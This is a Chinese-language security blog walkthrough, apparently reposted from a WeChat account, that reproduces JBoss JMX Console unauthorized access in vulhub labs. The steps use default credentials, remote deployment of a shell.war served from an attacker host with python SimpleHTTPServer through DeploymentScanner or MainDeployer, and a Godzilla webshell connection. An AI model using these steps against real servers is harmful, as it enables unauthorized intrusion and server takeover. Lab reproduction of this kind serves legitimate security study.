JMX Console未授权访问

admin 2025年6月7日01:31:14评论0 views字数 975阅读3分15秒阅读模式

低版本JMX Console未授权访问Getshell

漏洞描述 

此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者 可以进 jmx控制台,并在其中执行任何功能。

漏洞影响范围 

Jboss4.x以下

cd /pentest/vulhub/jboss/CVE-2017-7504 docker-compose up -d
访问http://192.168.1.137:8080/

这里我们使用的复现环境是不存在的 , 所以需要密码

admin/admin

然后找到 jboss.deployment(jboss 自带的部署功能)中的flavor=URL,type=DeploymentScanner点进去 (通过 url 的方式远程部署)

JMX Console未授权访问

制作war包 , 这里用之前制作好的 shell.war , 然后用 python 开启web服务

python2 -m SimpleHTTPServer 80

填写war包远程地址

http://192.168.1.137/shell.war

JMX Console未授权访问

高版本JMX Console未授权访问getshell

漏洞描述 

JMX Console默认存在未授权访问,直接点击JBoss主页中的 JMX Console 链接进入JMX Console页面 ,通过 部署war包 , getshell。

漏洞描述 

Jboss6.x以下

环境搭建

cd /pentest/vulhub/jboss/CVE-2017-12149 

docker-compose up -d

漏洞复现

http://192.168.1.137:8080/jmx-console/

这里使用的环境是CVE-2017-12149,所以需要输入密码

admin 

vulhub 

本地搭建部署点 在JMX Console页面点击jboss.system链接,在Jboss.system页面中点击service=MainDeployer

进入service=MainDeployer页面之后,找到methodIndex为17或19的deploy 填写远程war包地址进行 远程部署

JMX Console未授权访问

kaili启动监听,并上传前面的shell.war到kali网址根目录

python2 -m SimpleHTTPServer 80 

点击Invoke

JMX Console未授权访问

下载成功

JMX Console未授权访问

哥斯拉连接

JMX Console未授权访问

原文始发于微信公众号(智检安全):JMX Console未授权访问

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月7日01:31:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   JMX Console未授权访问http://cn-sec.com/archives/3868589.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息